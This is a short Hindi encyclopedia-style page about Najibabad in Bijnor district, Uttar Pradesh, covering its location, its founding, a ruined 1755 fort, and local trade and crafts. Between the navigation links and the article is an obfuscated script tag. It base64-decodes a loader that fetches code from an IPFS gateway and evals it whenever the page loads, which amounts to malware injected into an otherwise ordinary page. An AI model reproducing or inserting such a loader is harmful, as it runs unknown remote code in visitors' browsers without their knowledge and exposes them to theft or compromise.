नज़ीबाबाद
गणराज्य | इतिहास | पर्यटन | भूगोल | विज्ञान | कला | साहित्य | धर्म | संस्कृति | शब्दावली | विश्वकोश | भारतकोश |
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
नगर
स्थिति : 29° 37' उत्तरी अक्षांश 78° 21' पूर्वी देशांतर। नज़ीबाबाद उत्तर प्रदेश राज्य में बिजनौर जिले का नगर एवं प्रमुख रेलवे जंक्शन है। इसकी स्थापना नबाव नजीबुद्दौला ने मुगलकाल में की थी। सन् 1755 में नजीबुद्दौला ने इसके एक मील पूर्व पत्थरगढ़ में एक किला बनवाया था जो अब खंडहर अवस्था में है। इसे नजफगढ़ भी कहते हैं। इसमें प्रयुक्त सामग्री पास ही स्थित मोरध्वज नामक प्राचीन किले से लाई गई थी। यहाँ का जलवायु स्वास्थ्यप्रद नहीं है, किंतु जल-निकास-प्रणाली उत्तम है। यहाँ पर मुबारक बुनियाद नामक इमारत है, जो 18वीं शती के अंत में बनाई गई थी, इसका उपयोग अब विश्रामगृह के रूप में होता है।
उद्योग
पहाड़ी क्षेत्रों से व्यापार में इसका प्रमुख स्थान है। धातु के बरतन, कपड़े, कंबल, जूते आदि यहाँ बनते हैं, इसके अतिरिक्त नमक, शक्कर, अनाज तथा लकड़ी का व्यापार होता है। तोडेदार बंदूकें यहाँ बनती हैं।
टीका टिप्पणी और संदर्भ